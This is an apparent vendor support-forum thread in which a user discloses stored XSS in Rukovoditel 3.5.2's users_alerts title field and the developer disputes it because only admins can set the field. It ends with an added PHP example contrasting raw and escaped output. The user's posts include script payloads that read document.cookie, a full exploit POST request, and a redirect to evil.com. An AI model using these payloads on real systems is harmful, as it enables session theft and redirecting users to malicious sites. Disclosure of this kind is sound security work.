Stored Cross-Site Scripting (XSS) in users_alerts

Any critical bugs will be fixed within 24-48 hours.
Toxi4
Posts: 6
Joined: 08 Apr 2024, 14:31
Name: Anton Kartunov
Location: Russia

Stored Cross-Site Scripting (XSS) in users_alerts

Post by Toxi4 »

Hey!

I found an XSS vulnerability in the users_alerts module.
In the title parameter when creating an alert for all users, you can insert a payload.

Payload: "/><script>alert(document.cookie)</script>.

Request:

POST /index.php?module=users_alerts/users_alerts&action=save&id=1&token=QRVySyiI7t HTTP/1.1
Host: 192.168.0.15
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: application/x-www-form-urlencoded
Cookie: [cookie]
Upgrade-Insecure-Requests: 1

form_session_token=QRVySyiI7t&is_active=1&type=warning&title=qwerty%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Eqwerty&description=qwerty&location=all&start_date=2024-04-08&end_date=2024-04-10&users_groups%5B%5D=0&users_groups%5B%5D=6&assigned_to%5B%5D=1&assigned_to%5B%5D=2

The script can run on all pages of all users.

Through this vulnerability, an attacker can steal the sessions of all users of the system or redirect them to the attacker’s website. But to exploit this vulnerability, the attacker needs admin access.

I have used Rukovoditel 3.5.2.
support
Site Admin
Posts: 6215
Joined: 19 Oct 2014, 18:22
Name: Sergey Kharchishin
Location: Russia, Evpatoriya

Re: Stored Cross-Site Scripting (XSS) in users_alerts

Post by support »

Anton, this is not a vulnerability. As an administrator you can add your own PHP/JS/HTML code for the app. This is not a bug or a vulnerability.

Re: Stored Cross-Site Scripting (XSS) in users_alerts

Post by Toxi4 »

I’ll answer here the same way as in the other post. viewtopic.php?p=20132

I can't agree with you. Even if the application has functionality for adding HTML/PHP/JS code, it is still necessary to filter out potentially dangerous functions.

I don’t think that your users will be happy if they are redirected to a malicious site after logging in.

"/><script>location.replace("https://evil.com")</script>

Or if an unscrupulous administrator decides to steal the cookies of all users and enter their personal accounts.

I also want to add that it seems to me that there is no point in adding HTML/PHP/JS code to the alerts function for users :)

Re: Stored Cross-Site Scripting (XSS) in users_alerts

Post by support »

As I said before, it is a vulnerability if a non-admin user can add something like this. There are PHP code and JS code field types, and an ADMIN user can add any code there too. And this is not a vulnerability either, because this is how the app works. An admin can add their own custom code for the app.

So to find any XSS, please log in as a non-admin user.
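
An added example, not code from this thread or from Rukovoditel: the title value from the reported request, written into HTML once as raw markup and once encoded at output time. The function names, the markup, and the type allowlist are assumptions, since the thread does not show how the application renders alerts.

```php
<?php
// Added illustration. render_alert_raw(), render_alert_escaped(), the markup
// and the allowlist are hypothetical and are not Rukovoditel's code.

// Title value from the request in the first post, URL-decoded.
$title = 'qwerty"/><script>alert(document.cookie)</script>qwerty';

// Unencoded output: the stored value reaches the page as markup, so any
// tags inside it become part of the document for every viewer.
function render_alert_raw(string $type, string $title): string
{
    return '<div class="alert alert-' . $type . '">' . $title . '</div>';
}

// Encoded output: the stored value is treated as text. ENT_QUOTES covers
// both quote characters, so the same encoded string is safe inside a
// quoted attribute as well as in element content.
function render_alert_escaped(string $type, string $title): string
{
    // The alert type lands in a class attribute, so restrict it to known values.
    $allowed = ['info', 'warning', 'danger']; // constructed allowlist
    if (!in_array($type, $allowed, true)) {
        $type = 'info';
    }
    $safe = htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="alert alert-' . $type . '" title="' . $safe . '">'
         . $safe . '</div>';
}

$raw     = render_alert_raw('warning', $title);
$escaped = render_alert_escaped('warning', $title);

// Report whether each rendering still contains a live script element.
foreach (['raw' => $raw, 'escaped' => $escaped] as $label => $html) {
    $live = strpos($html, '<script>') !== false;
    echo $label, ': ', ($live ? 'script tag present' : 'script tag neutralized'), PHP_EOL;
}

echo $escaped, PHP_EOL;
```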